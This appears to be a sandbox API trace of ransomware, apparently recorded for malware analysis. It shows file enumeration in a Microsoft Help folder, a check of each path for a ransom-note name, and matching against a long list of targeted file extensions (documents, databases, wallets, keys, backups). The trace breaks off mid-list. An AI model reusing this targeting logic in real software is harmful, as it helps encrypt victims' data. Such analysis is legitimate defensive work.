	[0177.883] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x627ceff1, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x627ceff1, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x628617bd, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.POWERPNT.16.1033.hxn", cAlternateFileName="MSPOWE~1.HXN")) returned 1
	[0177.883] lstrcmpW (lpString1="MS.POWERPNT.16.1033.hxn", lpString2="..") returned 1
	[0177.883] lstrcmpW (lpString1="MS.POWERPNT.16.1033.hxn", lpString2=".") returned 1
	[0177.883] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.883] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.POWERPNT.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.16.1033.hxn"
	[0177.883] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.16.1033.hxn") returned 57
	[0177.883] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.883] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.16.1033.hxn", cchLength=0x39 | out: lpsz="c:\\users\\all users\\microsoft help\\ms.powerpnt.16.1033.hxn") returned 0x39
	[0177.884] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.884] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.powerpnt.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.884] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.powerpnt.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.powerpnt.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.powerpnt.16.1033.hxn"
	[0177.884] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.powerpnt.16.1033.hxn") returned 57
	[0177.884] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.884] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.885] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.885] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.885] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.886] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x5c58e036, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x5c58e036, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x5cef0812, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.SETLANG.16.1033.hxn", cAlternateFileName="MSSETL~1.HXN")) returned 1
	[0177.886] lstrcmpW (lpString1="MS.SETLANG.16.1033.hxn", lpString2="..") returned 1
	[0177.886] lstrcmpW (lpString1="MS.SETLANG.16.1033.hxn", lpString2=".") returned 1
	[0177.886] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.886] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.SETLANG.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.16.1033.hxn"
	[0177.886] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.16.1033.hxn") returned 56
	[0177.886] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.886] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.16.1033.hxn", cchLength=0x38 | out: lpsz="c:\\users\\all users\\microsoft help\\ms.setlang.16.1033.hxn") returned 0x38
	[0177.886] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.887] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.setlang.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.887] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.setlang.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.setlang.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.setlang.16.1033.hxn"
	[0177.887] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.setlang.16.1033.hxn") returned 56
	[0177.887] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.887] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.887] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.887] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.888] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.888] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x58ff9ac9, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x58ff9ac9, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x594457dd, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.SKYPEFB.16.1033.hxn", cAlternateFileName="MSSKYP~1.HXN")) returned 1
	[0177.888] lstrcmpW (lpString1="MS.SKYPEFB.16.1033.hxn", lpString2="..") returned 1
	[0177.888] lstrcmpW (lpString1="MS.SKYPEFB.16.1033.hxn", lpString2=".") returned 1
	[0177.888] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.888] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.SKYPEFB.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.SKYPEFB.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.SKYPEFB.16.1033.hxn"
	[0177.888] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.SKYPEFB.16.1033.hxn") returned 56
	[0177.889] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.889] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.SKYPEFB.16.1033.hxn", cchLength=0x38 | out: lpsz="c:\\users\\all users\\microsoft help\\ms.skypefb.16.1033.hxn") returned 0x38
	[0177.889] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.889] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.skypefb.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.889] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.skypefb.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.skypefb.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.skypefb.16.1033.hxn"
	[0177.889] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.skypefb.16.1033.hxn") returned 56
	[0177.889] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.889] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.890] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.890] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.890] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx